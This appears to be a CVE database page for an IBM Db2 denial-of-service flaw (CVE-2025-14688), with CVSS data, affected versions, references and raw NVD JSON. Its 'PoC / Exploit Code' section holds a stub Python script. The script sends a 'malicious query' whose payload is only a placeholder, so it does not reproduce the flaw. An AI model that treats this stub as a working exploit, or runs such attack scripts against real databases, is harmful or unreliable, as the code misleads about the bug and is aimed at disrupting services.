CVE-2025-14688

Description

IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.3 for Linux, UNIX and Windows (includes Db2 Connect Server) could allow an authenticated user to cause a denial of service due to improper neutralization of special elements in data query logic when certain configurations exist.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:* - VULNERABLE

cpe:2.3:a:ibm:db2:*:*:*:*:*:unix:*:* - VULNERABLE

cpe:2.3:a:ibm:db2:*:*:*:*:*:windows:*:* - VULNERABLE

cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:* - VULNERABLE

cpe:2.3:a:ibm:db2:*:*:*:*:*:unix:*:* - VULNERABLE

IBM Db2 11.5.0 - 11.5.9

IBM Db2 12.1.0 - 12.1.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2025-14688: IBM Db2 Denial of Service
# This is a conceptual demonstration. The specific payload requires knowledge of the vulnerable configuration.

import ibm_db

# Target configuration
conn_str = "DATABASE=sample;HOSTNAME=localhost;PORT=50000;UID=db2inst1;PWD=password;"

def trigger_dos():
    try:
        # 1. Establish connection to the vulnerable Db2 instance
        conn = ibm_db.connect(conn_str, '', '')
        print("[+] Connected to IBM Db2")

        # 2. Craft a malicious query containing special elements
        # The special elements are not properly neutralized in certain configurations
        # leading to a crash or hang.
        # Example: A query with specific nested logic or special characters that the parser mishandles.
        malicious_query = "SELECT * FROM SYSIBM.SYSDUMMY1 WHERE '<SPECIAL_ELEMENT_PAYLOAD>' = '<SPECIAL_ELEMENT_PAYLOAD>'"
        
        print("[+] Sending malicious query...")
        
        # 3. Execute the query
        stmt = ibm_db.prepare(conn, malicious_query)
        ibm_db.execute(stmt)
        
        # If successful, the service may become unresponsive at this point.
        print("[!] Query executed. Database service may now be unavailable.")
        
    except Exception as e:
        print(f"[-] An error occurred: {e}")
    finally:
        if 'conn' in locals() and conn:
            ibm_db.close(conn)

if __name__ == "__main__":
    trigger_dos()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14688
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14688
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14688/
[4] VulDB https://vuldb.com/cve/CVE-2025-14688
[5] https://www.ibm.com/support/pages/node/7269424

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14688", "sourceIdentifier": "[email protected]", "published": "2026-04-30T22:16:24.093", "lastModified": "2026-05-01T17:52:29.293", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.3 for Linux, UNIX and Windows (includes Db2 Connect Server) could allow an authenticated user to cause a denial of service due to improper neutralization of special elements in data query logic when certain configurations exist."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:*", "versionStartIncluding": "11.5.0", "versionEndIncluding": "11.5.9", "matchCriteriaId": "ECAF5576-B4A5-4DB7-94F0-942F656F0461"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:unix:*:*", "versionStartIncluding": "11.5.0", "versionEndIncluding": "11.5.9", "matchCriteriaId": "B1E165E8-F11B-4F13-B54A-90D29CA2ABF8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:windows:*:*", "versionStartIncluding": "11.5.0", "versionEndIncluding": "11.5.9", "matchCriteriaId": "727E2804-2D3D-4C31-A3E5-F99107D02A27"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:*", "versionStartIncluding": "12.1.0", "versionEndIncluding": "12.1.3", "matchCriteriaId": "2AA1764B-CD82-4B33-B85B-27CA2F7C0ED5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:unix:*:*", "versionStartIncluding": "12.1.0", "versionEndIncluding": "12.1.3", "matchCriteriaId": "8F63D92C-AC19-4FB0-A605-08DC01875E7B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:windows:*:*", "versionStartIncluding": "12.1.0", "versionEndIncluding": "12.1.3", "matchCriteriaId": "E28DCDF3-EF5B-47D6-BD38-C98334B67BE4"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7269424", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}